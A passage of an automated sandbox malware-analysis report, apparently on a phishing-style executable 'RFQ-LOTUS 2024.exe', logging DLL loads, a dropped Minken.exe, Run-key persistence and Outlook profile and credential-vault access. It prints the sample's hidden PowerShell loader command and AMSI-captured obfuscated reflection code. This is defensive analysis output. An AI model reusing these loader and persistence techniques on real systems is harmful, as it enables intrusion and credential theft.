Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: powrprof.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: umpdc.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: ulib.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: ieframe.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: mlang.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: winsqlite3.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: vaultcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: wintypes.dll			Jump to behavior

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\fc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: RFQ-LOTUS 2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: fc.pdb source: Minken.exe, 0000000C.00000003.2828157923.0000000007119000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fc.pdbGCTL source: Minken.exe, 0000000C.00000003.2828157923.0000000007119000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2593503966.0000000007B47000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Minken.exe, 0000000C.00000003.2734555224.0000000022DC9000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmp, Minken.exe, 0000000C.00000003.2737199263.0000000022F77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Minken.exe, Minken.exe, 0000000C.00000003.2734555224.0000000022DC9000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmp, Minken.exe, 0000000C.00000003.2737199263.0000000022F77000.00000004.00000020.00020000.00000000.sdmp, fc.exe
Source:	Binary string: mshtml.pdbUGP source: Minken.exe, 0000000C.00000001.2418106236.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb5q source: powershell.exe, 00000001.00000002.2596755674.0000000008C70000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match

File source: 00000001.00000002.2597157213.000000000B490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Groenligt $observatrerne $Oarlock), (Seroprognosis @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Markprver = [AppDomain]::CurrentDomain.GetAssemblies()$g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bathyscaph)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Nummereringsmetodernes, $false).DefineType($Mi

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"			Jump to behavior

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)"
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD95EB pushad ; ret		1_2_04DD95FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD12D8 push esp; retf		1_2_04DD12E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD92D3 push edx; ret		1_2_04DD92F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD92C7 push ecx; ret		1_2_04DD92D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD92F3 push edx; ret		1_2_04DD9302
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD9353 push esi; ret		1_2_04DD9372
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD9343 push ebp; ret		1_2_04DD9352
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD933D push ebx; ret		1_2_04DD9342
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD932D push ebx; ret		1_2_04DD9332
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD9D98 push edx; ret		1_2_04DD9E56
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DD9A58 push eax; ret		1_2_04DD9D96
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07ADC058 pushfd ; ret		1_2_07ADC3A5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_089A2097 push ebx; retf		1_2_089A20BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_089A296C push ebx; ret		1_2_089A29FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_089A1F8B push ebx; retf		1_2_089A202A
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02169275 push ds; retf		17_2_02169276
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0217704F push cs; retf		17_2_02177050
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0218391B push esp; iretd		17_2_0218396B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02169763 push 00000005h; iretd		17_2_02169765
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02176F61 push ebx; iretd		17_2_02176F6D
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02164789 push esp; ret		17_2_0216478D
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_021734EE push FFFFFF9Ah; iretd		17_2_021734F2
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02173546 push ebx; iretd		17_2_02173500
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0217354B push ebx; iretd		17_2_02173500
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D5C43B push cs; retf		17_2_04D5C43C
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D68D07 push esp; iretd		17_2_04D68D57
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D4BEC9 push ss; ret		17_2_04D4BEF1
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D4BEC9 push edx; iretd		17_2_04D4BF34
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D4BF14 push edx; iretd		17_2_04D4BF34
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D588DA push FFFFFF9Ah; iretd		17_2_04D588DE
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D58937 push ebx; iretd		17_2_04D588EC

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Minken.exe

Jump to dropped file

Boot Survival

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Paraferingen			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Paraferingen			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
